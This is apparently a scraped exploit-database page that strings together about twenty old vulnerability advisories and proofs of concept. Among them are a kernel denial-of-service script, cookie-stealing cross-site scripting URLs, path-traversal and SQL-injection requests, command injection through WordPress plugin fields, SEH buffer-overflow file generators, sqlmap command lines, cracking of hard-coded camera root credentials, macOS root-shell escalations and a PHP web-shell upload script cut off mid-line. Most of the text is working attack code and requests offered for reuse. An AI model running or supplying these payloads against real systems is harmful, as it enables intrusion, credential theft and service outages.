HireHackking

source: https://www.securityfocus.com/bid/56939/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause an infinite loop, resulting in a denial-of-service condition. #!/usr/bin/env python ## Borrows code from """Calculate and manipulate CRC32. http://en.wikipedia.org/wiki/Cyclic_redundancy_check -- StalkR """ ## See https://github.com/StalkR/misc/blob/master/crypto/crc32.py import struct import sys import os # Polynoms in reversed notation POLYNOMS = { 'CRC-32-IEEE': 0xedb88320, # 802.3 'CRC-32C': 0x82F63B78, # Castagnoli 'CRC-32K': 0xEB31D82E, # Koopman 'CRC-32Q': 0xD5828281, } class CRC32(object): """A class to calculate and manipulate CRC32. Use one instance per type of polynom you want to use. Use calc() to calculate a crc32. Use forge() to forge crc32 by adding 4 bytes anywhere. """ def __init__(self, type="CRC-32C"): if type not in POLYNOMS: raise Error("Unknown polynom. %s" % type) self.polynom = POLYNOMS[type] self.table, self.reverse = [0]*256, [0]*256 self._build_tables() def _build_tables(self): for i in range(256): fwd = i rev = i << 24 for j in range(8, 0, -1): # build normal table if (fwd & 1) == 1: fwd = (fwd >> 1) ^ self.polynom else: fwd >>= 1 self.table[i] = fwd & 0xffffffff # build reverse table =) if rev & 0x80000000 == 0x80000000: rev = ((rev ^ self.polynom) << 1) | 1 else: rev <<= 1 rev &= 0xffffffff self.reverse[i] = rev def calc(self, s): """Calculate crc32 of a string. Same crc32 as in (binascii.crc32)&0xffffffff. """ crc = 0xffffffff for c in s: crc = (crc >> 8) ^ self.table[(crc ^ ord(c)) & 0xff] return crc^0xffffffff def forge(self, wanted_crc, s, pos=None): """Forge crc32 of a string by adding 4 bytes at position pos.""" if pos is None: pos = len(s) # forward calculation of CRC up to pos, sets current forward CRC state fwd_crc = 0xffffffff for c in s[:pos]: fwd_crc = (fwd_crc >> 8) ^ self.table[(fwd_crc ^ ord(c)) & 0xff] # backward calculation of CRC up to pos, sets wanted backward CRC state bkd_crc = wanted_crc^0xffffffff for c in s[pos:][::-1]: bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c) # deduce the 4 bytes we need to insert for c in struct.pack('<L',fwd_crc)[::-1]: bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c) res = s[:pos] + struct.pack('<L', bkd_crc) + s[pos:] return res if __name__=='__main__': hack = False ITERATIONS = 10 crc = CRC32() wanted_crc = 0x00000000 for i in range (ITERATIONS): for j in range(55): str = os.urandom (16).encode ("hex").strip ("\x00") if hack: f = crc.forge(wanted_crc, str, 4) if ("/" not in f) and ("\x00" not in f): file (f, 'a').close() else: file (str, 'a').close () wanted_crc += 1

source: https://www.securityfocus.com/bid/56995/info The Bit Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. http://www.example.com/index.php?option=com_bit&controller=../../../../../../../../../../../../../../../etc/passwd%00

Source: https://code.google.com/p/google-security-research/issues/detail?id=478 The Install.framework runner suid root binary does not correctly account for the fact that Distributed Objects can be connected to by multiple clients at the same time. By connecting two proxy objects to an IFInstallRunner and calling [IFInstallRunner makeReceiptDirAt:asRoot:] in the first and passing a custom object as the directory name we can get a callback to our code just after the makeReceiptDirAt code has called seteuid(0);setguid(0) to regain privs. Since BSD priviledges are per-process this means that our other proxy object will now have euid 0 without having to provide an authorization reference. In this second proxy we can then just call runTaskSecurely and get a root shell before returning from the first proxy's callback function which will then drop privs. build using the provided makefile and run passing the full path to the localhost shell Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38136.zip

Exploit Title: ManageEngine EventLog Analyzer SQL query execution Product: ManageEngine EventLog Analyzer Vulnerable Versions: v10.6 build 10060 and previous versions Tested Version: v10.6 build 10060 (Windows) Advisory Publication: 14/09/2015 Vulnerability Type: authenticated SQL query execution Credit: xistence <xistence[at]0x90.nl> Product Description ------------------- EventLog Analyzer carry out logs analysis for all Windows, Linux and Unix systems, Switches and Routers (Cisco), other Syslog supporting devices, and applications like IIS, MS SQL. Eventlog analyzer application is capable of performing real-time log file analysis. Event log files analyzer application can carry out log file analysis of imported files. The files can be imported from the archive or from any machine. When an important security event is generated on a machine in the network, event log file analyser application collects, performs log analysis and displays the event on the EventLog Analyzer Dashboard, in real-time. The event log report is generated from the analyzed event logs. From the event log reports (graphs), you can drill down to the raw log events and do a root cause analysis within minutes, and then focus on resolving it. The logging analyser application carry out imported and archived log files analyses to fulfill the requirements of forensic analysis and event log audit. The forensic and audit reports can be generated from the analyzed logs. Vulnerability Details --------------------- Every user has the ability to execute SQL queries through the "/event/runQuery.do" script, including the default "guest" user. (The SQL query option is just not visible in the web interface) Below is the POST request, executed as "guest": POST /event/runQuery.do HTTP/1.1 Host: 192.168.2.116:8400 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=XXXXXXXXXX Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 39 execute=true&query=select+version%28%29 Access to queries starting with "INSERT" or "UPDATE" is denied by default, however this can be bypassed by doing a select query first, like this: "SELECT 1;INSERT INTO ..." The included Postgres backend is running with SYSTEM privileges on Windows, allowing to write files to disk with these privileges. A Metasploit exploit module will be released shortly. Solution -------- ManageEngine has provided a patch to fix this issue, the steps to apply/fix this are as below: 1. Stop the ELA service. 2. Download the zip from http://bonitas2.zohocorp.com/zipUploads/2015_14_07_17_52_30_o_19q686iqs1sfemdf19e05sqre61.tar.gz and extract the folders. You would have two folders "EventLogAnalyzerJSP" and "LogAnalyzerClient" under "o_19q686iqs1sfemdf19e05sqre61". Copy these two folders and place it under <ELA Home>//lib/ folder. 3. The path of the following files would be as below: runQuery_jsp.class --> <ELA Home>\\lib\\EventLogAnalyzerJSP\\com\\adventnet\\sa\\jsp\\WEB_002dINF\\jsp RunQuery.class --> <ELA Home>\\lib\\LogAnalyzerClient\\com\\adventnet\\la\ 4. Restart the ELA service and check for the issue. Advisory Timeline ----------------- 07/11/2015 - Discovery and vendor notification 07/13/2015 - ManageEngine acknowledged issue 07/14/2015 - ManageEngine supplied fix 07/16/2015 - Verified fix and replied back to ManageEngine that the issue has been resolved 09/14/2015 - Public disclosure

Source: https://code.google.com/p/google-security-research/issues/detail?id=477 Install.framework has a suid root binary here: /System/Library/PrivateFrameworks/Install.framework/Resources/runner This binary vends the IFInstallRunner Distributed Object, which has the following method: [IFInstallRunner makeReceiptDirAt:asRoot:] If you pass 1 for asRoot, then this code will treat the makeReceiptDirAt string as a path and make two directories (Library/Receipts) below it. At first glance this code looks immediately racy and no doubt we could play some symlink tricks to get arbitrary directories created, but, on second glance, we can do a lot more! This code is using distributed objects which is a "transparent" IPC mechanism: what this means in practise is that not only can I call methods on the IFInstallRunner object running in the suid root process, but I can also pass it objects from my process; when the suid root process then tries to call methods on those object this will actually result in callbacks into my process :) In this case rather than just passing an NSString as the makeReceiptDirAt parameter I create and pass an instance of my own class "InitialPathObject" which behaves a bit like a string but gives me complete control over its behaviour from my process. By creating a couple of this custom classes and implementing various methods we can reach calls to mkdir, chown and unlink with euid == 0. We can completely control the string passed to mkdir and unlink. In the chown case the code will chown our controlled path to root:admin; regular os x users are members of the admin group which means that this will give the user access to files which previously belonged to a different group. To hit the three actions (mkdir, chown and unlink) with controlled arguments we need to override various combinations of selectors and fail at the right points: InitialPathObject = the object we pass to the makeReceiptDirAt selector overrides: - stringByAppendingPathComponent * will be called twice: * first time: return an NSString* pointing to a non-existant file * second time: return SecondFakeStringObject SecondFakeStringObject = returned by the second call to stringByAppendingPathComponent overrides: - length * will be called by the NSFileManager? * return length of path to non-existant file - getCharacters: * will be called by the NSFileManager? * return character of the non-existant file path - fileSystemRepresentation * for MKDIR: * first time: return char* of the target path * second time: return char* to non-existant file * third time: return char* to non-existant file * for CHOWN: * first time: return char* of temporary directory to create and ignore * second time: return char* of target path * for UNLINK: * first time: return char* of temporary directory to create and ignore * second time: return char* to non-existant file * third time: return char* to path to unlink - stringByAppendingPathComponent: * for MKDIR: * not called * for CHOWN: * return NSString* pointing to file which does exist // to bail out before creating /Receipts * for UNLINK * not called build: clang -o as_root_okay_then_poc as_root_okay_then_poc.m -framework Foundation run: ./as_root_okay_then_poc MKDIR|CHOWN|UNLINK <target> note that this will create some root-owned temporary directories in /tmp which will need to be manually cleaned up Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38137.zip

source: https://www.securityfocus.com/bid/57190/info The Incapsula component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Incapsula 1.4.6_b and prior are vulnerable. http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(document.cookie)</script> http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script>

Source: https://code.google.com/p/google-security-research/issues/detail?id=314 The private Install.framework has a few helper executables in /System/Library/PrivateFrameworks/Install.framework/Resources, one of which is suid root: -rwsr-sr-x 1 root wheel 113K Oct 1 2014 runner Taking a look at it we can see that it's vending an objective-c Distributed Object :) [ https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html ] The main function immediately temporarily drops privs doing seteuid(getuid()); setegid(getgid()); then reads line from stdin. It passes this to NSConnection rootProxyForConnectionWithRegisteredName to lookup that name in the DO namespace and create a proxy to connect to it via. It then allocates an IFInstallRunner which in its init method vends itself using a name made up of its pid, time() and random() It then calls the setRunnerConnectionName method on the proxy to tell it the IFInstallRunner's DO name so that whoever ran the runner can connect to the IFInstallRunner. The IFRunnerMessaging protocol tells us the methods and prototypes of the remote methods we can invoke on the IFInstallRunner. Most of the methods begin with a call to processKey which will set the euid back to root if the process can provide a valid admin authorization reference from authd (I'm not totally sure how that bit works yet, but it's not important for the bug.) Otherwise the euid will remain equal to the uid and the methods (like movePath, touchPath etc) will only run with the privs of the user. The methods then mostly end with a call to restoreUIDs which will drop back to euid==uid if we did temporarily regain root privs (with the auth ref.) Not all methods we can invoke are like that though... IFInstallRunner setExternalAuthorizationRef calls seteuid(0);setegid(0); to regain root privs without requiring any auth. It then calls AuthorizationCreateFromExternalForm passing the bytes of an NSData we give it. If that call doesn't return 0 then the error branch calls syslog with the string: "Fatal error: unable to internalize authorization reference." but there's actually nothing fatal, it just returns from the method, whereas the success branch goes on to restore euid and egid, which means that if we can get AuthorizationCreateFromExternalForm to fail then we can get the priv dropping-regaining state machine out-of-sync :) Getting AuthorizationCreateFromExternalForm to fail is trivial, just provide a malformed auth_ref (like "AAAAAAAAAAAAAAAAAAA" ) Now the next method we invoke will run with euid 0 even without having the correct auth ref :) This PoC first calls setBatonPath to point the baton executable path to a localhost bind-shell then triggers the bug and calls runTaskSecurely which will create an NSTask and launch the bind-shell with euid 0 :) We can then just nc to it and get a root shell tl;dr: the error path in setExternalAuthorizationRef should either be fatal or drop privs! Make sure you have the latest xcode installed and run the get_shell.sh script to build and run the PoC. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38138.zip

Exploit Title: ManageEngine OpManager multiple vulnerabilities Product: ManageEngine OpManager Vulnerable Versions: v11.5 and previous versions Tested Version: v11.5 (Windows) Advisory Publication: 14/09/2015 Vulnerability Type: hardcoded credentials, SQL query protection bypass Credit: xistence <xistence[at]0x90.nl> Product Description ------------------- ManageEngine OpManager is a network, server, and virtualization monitoring software that helps SMEs, large enterprises and service providers manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation. Do-it-yourself plug-ins extend the scope of management to include network change and configuration management and IP address management as well as monitoring of networks, applications, databases, virtualization and NetFlow-based bandwidth. Vulnerability Details --------------------- ManageEngine OpManager ships with a default account "IntegrationUser" with the password "plugin". This account is hidden from the user interface and will never show up in the user management. Also changing the password for this account is not possible by default. The account however is assigned Administrator privileges and logging in with this account is possible via the web interface. Below you can see the account in the PostgreSQL database after a fresh installation: C:\ManageEngine\OpManager\pgsql\bin>psql.exe -h 127.0.0.1 -p 13306 -U postgres -d OpManagerDB psql (9.2.4) OpManagerDB=# select * from userpasswordtable where userid = 2; userid | username | password | ownername | domainname | sipenabled --------+-----------------+-----------+-----------+------------+------------ 2 | IntegrationUser | d7962CgyJ | NULL | NULL | false (1 row) The above password decrypted is "plugin". Any account that has access to the web interface with Administrator rights can use a web form (/api/json/admin/SubmitQuery) to execute SQL queries on the backend PostgreSQL instance. By default restrictions apply and queries that start with INSERT/UPDATE/DELETE are not allowed to be executed, this is however very easy to bypass by using something like "INSERT/**/INTO...". The "/**/" comment will create a space and the function is not detected by OpManager's protection and will be executed. The PostgreSQL environment runs as SYSTEM under Windows. By writing a WAR payload to the "tomcat/webroot" directory, the WAR payload will be deployed automatically and will give a shell with SYSTEM privileges. A metasploit module will be release shortly. Solution -------- ManageEngine has provided a patch to fix this issue: https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability Advisory Timeline ----------------- 05/17/2015 - Discovery and vendor notification 05/22/2015 - ManageEngine acknowledged issue 07/10/2015 - Requested status update 07/17/2015 - ManageEngine supplied fix 07/24/2015 - ManageEngine provied definitive fix at https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability 09/14/2015 - Public disclosure

source: https://www.securityfocus.com/bid/57212/info Dell OpenManage Server Administrator is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. OpenManage Server Administrator 7.1.0.1 and prior versions are vulnerable. https://www.example.com:1311/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="></iframe><iframe src="javascript:alert(/xss/)

# Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary File Download (admin/colaborator required) # Google Dork: - # Date: 12/09/2015 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/elisqlreports/ # Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip # Version: < 4.11.33, fixed in 4.11.37 # Tested on: Debian GNU/Linux 7 with Wordpress 4.3 # CVE : N/A # # Summary: The plugin allows a wordpress site administrator or collaborator to download arbitrary files from the host file system though the plugin functionality of downloading .sql, .sql.zip or .sql.gz files created by the wordpress administrator. # The file name to download is not sanitized and path traversal can be injected in the request. # # Timeline: # - 09/09/2015: Fist contact with the author # - 11/09/2015: Author creates fix and communicate to me # - 12/09/2015: Public release of the new plugin version # POC: To retrieve the wp-config.php file: GET /wp-admin/admin.php?page=ELISQLREPORTS-settings&Download_SQL_Backup=../../../wp-config.php HTTP/1.1 Host: <the host with the wordpress> Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: <User-Agent> Referer: http://<the host with the wordpress>/wp-admin/admin.php?page=ELISQLREPORTS-settings Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_[...etc...]4af418c3efd # Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary Code Execution (admin/colaborator required) # Google Dork: - # Date: 12/09/2015 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/elisqlreports/ # Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip # Version: < 4.11.33, fixed in 4.11.37 # Tested on: Debian GNU/Linux 7 with Wordpress 4.3 # CVE : N/A # # Summary: There are several calls to "passtthru" in the code, one of them is receiving the username, password, database name and host from the $_POST arguments, so you can inject in every of this parameter the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql" # # Timeline: # - 09/09/2015: Fist contact with the author # - 11/09/2015: Author creates fix and communicate to me # - 12/09/2015: Public release of the new plugin version # POC: Send a POST request like this to obtain in the folder wp-admin a file with name "testrce.txt". The parameters DB_NAME, DB_HOST, DB_USER, and DB_PASSWORD are injectable: POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1 Host: <wordpress web> Proxy-Connection: keep-alive Content-Length: 177 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://<wordpress web> Upgrade-Insecure-Requests: 1 User-Agent: <the user agent> Content-Type: application/x-www-form-urlencoded Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_8fa[...etc...]b7d DB_NAME=<the db name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86

source: https://www.securityfocus.com/bid/57200/info The NextGEN Gallery plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. NextGEN Gallery 1.9.10 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=[Xss]

[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt Vendor: ================================ www.checkpoint.com http://pingtool.org/downloads/IKEView.exe Product: ================================================== IKEView.exe Feature Pack NGX R60 - Build 591000004 IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall phase(1 & 2) packets being exchanged with switches and gateways. IKEVIEW is a Checkpoint Partner tool available for VPN troubleshooting purposes. It is a Windows executable that can be downloaded from Checkpoint.com. This file parses the IKE.elg file located on the firewall. To use IKEVIEW for VPN troubleshooting do the following: 1. From the checkpoint firewall type the following: vpn debug ikeon This will create the IKE.elg file located in $FWDIR/log 2. Attempt to establish the VPN tunnel. All phases of the connection will be logged to the IKE.elg file. 3. SCP the file to your local desktop. WINSCP works great 4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file. Vulnerability Type: ====================== Stack Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ===================== IKEView.exe is vulnerable to local stack based buffer overflow when parsing an malicious (internet key exchange) ".elg" file. Vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after IKEView parses our malicious file, which may result then result in arbitrary attacker supplied code execution. Tested on Windows SP1 0018F868 |41414141 AAAA 0018F86C |01FC56D0 ÐVü ASCII "File loaded in 47 minutes, 00 seconds." 0018F870 |41414141 AAAA 0018F874 |41414141 AAAA Pointer to next SEH record 0018F878 |42424242 BBBB SE handler 0018F87C |00000002 ... Quick Buffer Overflow POC : =========================== 1) Below python file to create POC save as .py it will generate POC file, open in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM! seh="B"*4 #<----------will overwrite SEH with bunch of 42's HEX for 'B' ASCII char. file="C:\\IKEView-R60-buffer-overflow.elg" x=open(file,"w") payload="A"*4428+seh x.write(payload) x.close() print "\n=======================================\n" print " IKEView-R60-buffer-overflow.elg file created\n" print " hyp3rlinx ..." print "=========================================\n" Exploitation Technique: ======================= Local Severity Level: ========================================================= High Description: ========================================================== Vulnerable Product: [+] IKEView.exe Feature Pack NGX R60 - Build 591000004 Vulnerable File Type: [+] .elg Affected Area(s): [+] Local OS =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

source: https://www.securityfocus.com/bid/57230/info TinyBrowser is prone to multiple vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))

TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials Vendor: TP-LINK Technologies Co., Ltd. Product web page: http://www.tp-link.us Affected version: NC220 V1 1.0.28 Build 150629 Rel.22346 NC200 V1 2.0.15 Build 150701 Rel.20962 Summary: Designed with simplicity in mind, TP-LINK's Cloud Cameras are a fast and trouble free way to keep track on what's going on in and around your home. Video monitoring, recording and sharing has never been easier with the use of TP-LINK’s Cloud service. The excitement of possibilities never end. Desc: NC220 and NC200 utilizes hard-coded credentials within its Linux distribution image. These sets of credentials (root:root) are never exposed to the end-user and cannot be changed through any normal operation of the camera. Tested on: Linux Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5255 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php 20.07.2015 -- Initializing... root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root root_uImage p2048_newroot.cer root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh Nproot:x:0: root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me root@zslab:~# john crack.me Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x]) root (root) guesses: 1 time: 0:00:00:00 DONE (Mon Aug 3 05:52:55 2015) c/s: 400 trying: root - Userroot Use the "--show" option to display all of the cracked passwords reliably root@zslab:~# john crack.me --show root:root:0:0:Linux User,,,:/home/root:/bin/sh 1 password hash cracked, 0 left root@zslab:~#

source: https://www.securityfocus.com/bid/57230/info TinyBrowser is prone to multiple vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=

source: https://www.securityfocus.com/bid/57230/info TinyBrowser is prone to multiple vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=

''' ******************************************************************************************** # Exploit Title: Total Commander 32bit SEH Overwrite. # Date: 8/27/2015 # Exploit Author: Un_N0n # Software Vendor: http://www.ghisler.com/ # Software Link: http://www.ghisler.com/download.htm # Version: 8.52 # Tested on: Windows 8 x64(64 BIT) ******************************************************************************************** [Info:] EAX 00106541 ECX FFFFFEFA EDX 0031E941 EBX 04921F64 ESP 001065FC EBP 41414141 ESI 04930088 EDI 0031E9B0 EIP 41414141 SEH chain of main thread, item 0 Address=001065FC SE handler=41414141 ''' [Steps to Produce the Crash]: 1- Open up 'TOTALCMD.EXE'. 2- Goto Files -> Change Attributes. 3- In time field paste in contents of 'Crash.txt'. ~ Software will crash b/c SEH Overwrite. [Code for CRASH.txt] file = open("crash.txt",'w') file.write("A"*5000) file.close() ->After Reporting, Vendor has released(bugfix release) a new version(8.52a[9th SEPT 2015]). **********************************************************************************************

# Exploit Title: WordPress: cp-reservation-calendar 1.1.6 SQLi injection] # Date: 2015-09-15 # Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/ # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip # Version: 1.1.6 # OWASP Top10: A1-Injection A vulnerability has been detected in the WordPress cp reservation calendar Plugin v1.6. The vulnerability allows remote attackers to inject SQL commands. The sql injection vulnerability is located in the `dex_reservations.php` file. Remote attackers are able to execute own sql commands by manipulation of requested parameters. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6. Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. ============================ vulnerable function code... ============================ function dex_reservations_calendar_load2() { global $wpdb; if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' ) return; @ob_clean(); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Pragma: no-cache"); //following line is vulnerable... $calid = str_replace (TDE_RESERVATIONCAL_PREFIX, "",$_GET["id"]); $query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'"; $row_array = $wpdb->get_results($query,ARRAY_A); foreach ($row_array as $row) { $d1 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S])); $d2 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E])); echo $d1."-".$d2."\n"; echo $row[TDE_RESERVATIONDATA_TITLE]."\n"; echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n"; } exit(); } The following URL executes vulnerable function: http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1 ------------------------------------------------------------------------------------ POC using sqlmap tool:::: python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1" -p id --level=5 --risk=3 --dbms="MySQL" --dbs ########################################################################## The following URL is too vulnerable http://localhost/wordpress/?action=dex_reservations_check_posted_data post parameters:::: ------------------------------------- dex_reservations_post=1&dex_item=1 ------------------------------------ An unauthenticated user can use the following URL to inject malicious SQL code. [dex_item] on POST parameter is vulnerable ====================== vulnerable code ===================== is located in `dex_reservations.php` function code.. function dex_reservations_get_option ($field, $default_value) { global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id; if ($dex_option_buffered_id == CP_CALENDAR_ID) $value = $dex_option_buffered_item->$field; else { $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID ); $value = $myrows[0]->$field; $dex_option_buffered_item = $myrows[0]; $dex_option_buffered_id = CP_CALENDAR_ID; } if ($value == '' && $dex_option_buffered_item->calendar_language == '') $value = $default_value; return $value; } When this function is called the defined CP_CALENDAR_ID must contains an integer but it isn't validating the parameter [ CP_CALENDAR_ID ] ---------------------------------------------------------------------------- POC using sqlmap tool:::: python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1" -p dex_item --dbms="MySQL" --level=5 --risk=3 ############# time-line 2015-03-01: vulnerability found 2015-03-09: reported to vendor 2015-03-21-: released cp_reservation_calendar v1.1.7 2015-09-15: full disclosure

[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-FILE-UPLOAD.txt Vendor: ========================================= www.igniterealtime.org/projects/openfire www.igniterealtime.org/downloads/index.jsp Product: ================================ Openfire 3.10.2 Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Vulnerability Type: =================== Unrestricted File Upload CVE Reference: ============== N/A Vulnerability Details: ===================== Application specifies Plugin files (.jar) can be uploaded directly by using the form, however so can the following. .exe .php .jsp .py .sh Exploit code(s): =============== 1) choose some malicious file using the File browser 2) click 'upload plugin' http://localhost:9090/plugin-admin.jsp Our malicious uploaded files will be stored under /openfire/plugins directory. Disclosure Timeline: ========================================================= Vendor Notification: NA Sept 14, 2015 : Public Disclosure Exploitation Technique: ======================= Local Severity Level: ========================================================= Medium Description: ========================================================== Request Method(s): [+] POST Vulnerable Product: [+] Openfire 3.10.2 Vulnerable Parameter(s): [+] fileName Affected Area(s): [+] Server =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

source: https://www.securityfocus.com/bid/57098/info The Xerte Online plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Xerte Online 0.32 is vulnerable; other versions may also be affected. ################################################## # Description : Wordpress Plugins - Xerte Online Arbitrary File Upload Vulnerability # Version : 0.32 # Link : http://wordpress.org/extend/plugins/xerte-online/ # Plugins : http://downloads.wordpress.org/plugin/xerte-online.0.32.zip # Date : 30-12-2012 # Google Dork : inurl:/wp-content/plugins/xerte-online/ # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr ################################################## Exploit : PostShell.php <?php $code = "[CODE PHP]"; $ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php", 'filedata'=>"$code")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 